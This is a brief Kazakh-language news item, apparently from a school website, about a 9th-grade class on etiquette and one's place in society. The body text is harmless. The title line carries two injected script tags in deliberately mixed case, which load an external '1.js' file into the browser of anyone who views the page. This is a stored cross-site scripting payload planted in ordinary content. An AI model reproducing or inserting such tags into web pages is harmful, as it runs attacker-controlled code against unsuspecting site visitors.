Қоғамдағы орны және әдеп<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.10.2021
Бүгін мектебімізде 9 сыныпта «Қоғамдағы орны және әдеп» тақырыбында тәрбие сағаты өткізілді. Мақсаты - әдептілік туралы ұғым қалыптастыру, инабаттылық жайында оқушылардың ойын дамыту, қоғамдық ортада өзін - өзі ұстай білуге, оқушыларды адамгершілікке, әдептілікке, қарапайымдылыққа және кішіпейілділікке, ізгілік пен мәдениеттілікке, үлкенді сыйлауға, кішіге үлгі бола білуге тәрбиелеу және жаман әдеттерден аулақ болуға, өз халқының салт – дәстүрін үйрене отырып, әдет әліппесін дарыту.
Оқушылар әдептілік жайлы білімдерін осы тәрбиелік іс-шарамыз арқылы толықтыра отырып, өз ойларын ортаға салды. Белсенділік танытқан оқушылар үшін іс-шара қызықты әрі мазмұнды өтті.
Просмотров: 467